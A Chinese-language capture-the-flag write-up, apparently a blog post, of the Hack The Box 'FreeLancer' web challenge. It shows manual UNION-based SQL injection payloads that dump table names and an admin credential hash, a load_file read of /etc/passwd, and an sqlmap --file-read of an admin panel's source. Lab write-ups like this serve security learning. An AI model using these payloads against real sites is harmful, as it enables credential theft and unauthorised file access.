htb系列-Web Challenges-FreeLancer

FreeLancer

htb系列-Web Challenges-FreeLancer

信息收集

第一次玩htb,随便开道web试试

htb系列-Web Challenges-FreeLancer

看样子是个人搭建的博客

多的不说了,dirsearch扫一下,发现有mail目录信息泄露,访问后发现其目录下有contact_me.php文件,但是访问500

htb系列-Web Challenges-FreeLancer

页面上只有一个contact的功能,抓下包发现访问的即是contact_me.php

htb系列-Web Challenges-FreeLancer

证明考点可能是在这了

htb系列-Web Challenges-FreeLancer

但是无论怎么测试发现都是返回500,这里思路断了。

查看下源码,发现有hint

htb系列-Web Challenges-FreeLancer

这还不是sql注入?我当场吃掉

sql注入

sqlmap跑的太慢了,直接手注了

?id=-1%20union%20select%201,database(),3            
//freelancer

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘freelancer‘
//portfolio,safeadmin

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘freelancer‘ and table_name=‘safeadmin‘
//id,username,password,created_at

?id=-1 union select 1,group_concat(username),3 from freelancer.safeadmin

username:safeadm 
password:$2y$10$s2ZCi/tHICnA97uf4MfbZuhmOZQXdCnrM9VM9LBMHPp68vAXNRf4K

密码值无从得知,然后数据库里没找到flag

这里本来想写shell到mail目录下,可能开了权限,有waf,目录不对什么的把,写不进去

htb系列-Web Challenges-FreeLancer

先读一下目录吧,确定目录是对的,那可能就是权限问题无法写shell了

htb系列-Web Challenges-FreeLancer

再尝试读其他地方

-1%20union%20select%201,load_file(%27/etc/passwd%27),3

htb系列-Web Challenges-FreeLancer

这里思路又断了,每次思路断了我就掏出我的超级无敌大字典,爆它鸭的

爆出路径/administrat

访问发现需要登陆,这里有两种方法,带入数据库查询或,直接sqlmap读源码都可

sqlmap读源码

--file-read=/var/www/html/administrat/panel.php

htb系列-Web Challenges-FreeLancer

htb系列-Web Challenges-FreeLancer

上一篇:跨站跟踪攻击(CST/XST)


下一篇:Linux更改时间(限定于Ubuntu)